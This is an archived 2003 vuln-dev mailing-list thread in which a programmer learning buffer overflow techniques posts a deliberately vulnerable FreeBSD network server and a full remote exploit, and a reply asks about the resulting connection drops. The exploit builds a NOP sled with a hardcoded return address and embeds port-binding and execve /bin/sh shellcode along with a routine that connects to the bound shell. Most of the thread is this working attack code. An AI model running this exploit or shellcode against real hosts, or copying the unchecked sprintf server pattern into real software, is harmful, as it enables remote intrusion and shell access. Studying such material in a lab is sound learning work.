Re: sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/28/03

  • Next message: Ganbold: "Re: sample buffer overflow exploit problem"
    Date: Sun, 28 Sep 2003 15:06:29 +0900
    To: "deepcode ." <pondermate@hotmail.com>
    
    

    I don't know exactly what's wrong, but I suspect there might be a problem
    with shellcode.
    I tried to connect from different host and it is not working, the same
    problem, connection drops.

    Ganbold

    At 11:37 PM 9/27/2003 -0300, you wrote:

    >You say that you can connect after the exploit, but then the connection
    >gets dropped immediately afterwards... is there a firewall in place?
    >
    >>From: Ganbold <ganbold@micom.mng.net>
    >>To: vuln-dev@securityfocus.com
    >>Subject: sample buffer overflow exploit problem
    >>Date: Sat, 27 Sep 2003 16:54:59 +0900
    >>
    >>Hi,
    >>
    >>I'm very new to buffer overflow exploit technics and my boss wants me to
    >>thoroughly understand
    >>how it works. I'm trying to exploit sample network server in FreeBSD 5.1
    >>for this purpose.
    >>When I try to exploit using execve /bin/sh (shellcode1), it works and
    >>launches the shell in the remote machine.
    >>However when I try to use port binding shell code, it binds shell to the
    >>port, but when I try to connect to
    >>it, it just closes the connection. Also I can't connect to bind port
    >>after sending buffer using following code snippets:
    >>..............
    >> printf("[-] Connecting to bindshell...\n");
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(12345);
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> exec_sh(s);
    >>...............
    >>
    >>I appreciate if somebody give me some help to solve this test problem.
    >>Is there anywhere I can find detailed explanation about buffer overflows
    >>and working sample network exploits?
    >>Is there anyway I can generate shellcodes in FreeBSD?
    >>
    >>I attached my sample server code and exploit code.
    >>
    >>thanks in advance,
    >>
    >>Ganbold Ts,
    >>
    >>senior programmer,
    >>Micom Co., Ltd
    >>Ulaanbaatar,
    >>Mongolia
    >>
    >>
    >>
    >>Following is network server code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <netinet/in.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>
    >>#define BUFFER_SIZE 1024
    >>#define NAME_SIZE 2048
    >>
    >>int handle(int c)
    >>{
    >> char buffer[BUFFER_SIZE], name[NAME_SIZE];
    >> int bytes;
    >> strcpy(buffer, "Your name?: ");
    >> bytes = send(c, buffer, strlen(buffer), 0);
    >> if (bytes == -1)
    >> return -1;
    >> bytes = recv(c, name, sizeof(name), 0);
    >> if (bytes == -1)
    >> return -1;
    >> name[bytes - 1] = '\0';
    >> sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    >> bytes = send(c, buffer, strlen(buffer), 0);
    >> if (bytes == -1)
    >> return -1;
    >> return 0;
    >>}
    >>
    >>
    >>int main(int argc, char *argv[])
    >>{
    >> int s, c, cli_size;
    >> struct sockaddr_in srv, cli;
    >> if (argc != 2)
    >> {
    >> fprintf(stderr, "usage: %s port\n", argv[0]);
    >> return 1;
    >> }
    >> s = socket(AF_INET, SOCK_STREAM, 0);
    >> if (s == -1)
    >> {
    >> perror("socket() failed");
    >> return 2;
    >> }
    >> srv.sin_addr.s_addr = INADDR_ANY;
    >> srv.sin_port = htons( (unsigned short int) atol(argv[1]));
    >> srv.sin_family = AF_INET;
    >> if (bind(s, &srv, sizeof(srv)) == -1)
    >> {
    >> perror("bind() failed");
    >> return 3;
    >> }
    >> if (listen(s, 3) == -1)
    >> {
    >> perror("listen() failed");
    >> return 4;
    >> }
    >> for(;;)
    >> {
    >> c = accept(s, &cli, &cli_size);
    >> if (c == -1)
    >> {
    >> perror("accept() failed");
    >> return 5;
    >> }
    >> fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
    >> if (handle(c) == -1)
    >> fprintf(stderr, "%s: handle() failed", argv[0]);
    >> close(c);
    >> }
    >> return 0;
    >>}
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>Following is the sample exploit code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <netinet/in.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>#include <unistd.h>
    >>
    >>/*
    >> * FreeBSD shellcode - binds /bin/sh to a port 12345
    >> *
    >> * Claes M. Nyberg 20020619
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode[] = /* port _______*/
    >>
    >>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
    >>
    >>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
    >>
    >>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
    >>
    >>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
    >>
    >>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
    >>
    >>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    >>
    >>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
    >> "\x40\x50\x50\xcd\x80";
    >>
    >>/*
    >> * FreeBSD shellcode - execve /bin/sh
    >> *
    >> * Claes M. Nyberg 20020120
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode1[] =
    >> "\x31\xc0" /* xorl %eax, %eax */
    >> "\x50" /* pushl %eax */
    >> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    >> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    >> "\x89\xe3" /* movl %esp, %ebx */
    >> "\x50" /* pushl %eax */
    >> "\x53" /* pushl %ebx */
    >> "\x89\xe2" /* movl %esp, %edx */
    >> "\x50" /* pushl %eax */
    >> "\x52" /* pushl %edx */
    >> "\x53" /* pushl %ebx */
    >> "\x50" /* pushl %eax */
    >> "\xb0\x3b" /* movb $0x3b, %al */
    >> "\xcd\x80" /* int $0x80 */
    >> "\x31\xc0" /* xorl %eax, %eax */
    >> "\x40" /* inc %eax */
    >> "\x50" /* pushl %eax */
    >> "\x50" /* pushl %eax */
    >> "\xcd\x80"; /* int $0x80 */
    >>
    >>#define RET 0xbfbffa48
    >>
    >>int exec_sh(int sockfd)
    >>{
    >> char snd[4096],rcv[4096];
    >> fd_set rset;
    >> while(1)
    >> {
    >> FD_ZERO(&rset);
    >> FD_SET(fileno(stdin),&rset);
    >> FD_SET(sockfd,&rset);
    >> select(255,&rset,NULL,NULL,NULL);
    >> if(FD_ISSET(fileno(stdin),&rset))
    >> {
    >> memset(snd,0,sizeof(snd));
    >> fgets(snd,sizeof(snd),stdin);
    >> write(sockfd,snd,strlen(snd));
    >> }
    >> if(FD_ISSET(sockfd,&rset))
    >> {
    >> memset(rcv,0,sizeof(rcv));
    >> if(read(sockfd,rcv,sizeof(rcv))<=0)
    >> exit(0);
    >> fputs(rcv,stdout);
    >> }
    >> }
    >>}
    >>
    >>int main(int argc, char *argv[]) {
    >>
    >> char buffer[1064];
    >> int s,t, i, size;
    >> struct sockaddr_in remote;
    >> struct hostent *host;
    >>
    >> if(argc != 3) {
    >> printf("Usage: %s target-ip port\n", argv[0]);
    >> return -1;
    >> }
    >>
    >> // filling buffer with NOPs
    >> memset(buffer, 0x90, 1064);
    >>
    >> //copying shellcode into buffer
    >> memcpy(buffer+1001-sizeof(shellcode) , shellcode,
    >> sizeof(shellcode));
    >>
    >> // the previous statement causes a unintential Nullbyte at
    >> buffer[1000]
    >> buffer[1000] = 0x90;
    >>
    >> // Copying the return address multiple times at the end of the
    >> buffer...
    >> for(i=1022; i < 1059; i+=4) {
    >> * ((int *) &buffer[i]) = RET;
    >> }
    >>
    >> buffer[1063] = 0x0;
    >>
    >> //getting hostname
    >>
    >> host=gethostbyname(argv[1]);
    >> if (host==NULL)
    >> {
    >> fprintf(stderr, "Unknown Host %s\n",argv[1]);
    >> return -1;
    >> }
    >>
    >> // creating socket...
    >> s = socket(AF_INET, SOCK_STREAM, 0);
    >> if (s < 0)
    >> {
    >> fprintf(stderr, "Error: Socket\n");
    >> return -1;
    >> }
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(atoi(argv[2]));
    >> // connecting with destination host
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> //sending exploit string
    >> size = send(s, buffer, sizeof(buffer), 0);
    >> if (size==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "sending data failed\n");
    >> return -1;
    >> }
    >>/*
    >> printf("[-] Connecting to bindshell...\n");
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(12345);
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> exec_sh(s);
    >>*/
    >> // closing socket
    >> close(s);
    >>}
    >>
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>
    >
    >_________________________________________________________________
    >STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
    >http://join.msn.com/?page=features/junkmail
    >
    >


  • Next message: Ganbold: "Re: sample buffer overflow exploit problem"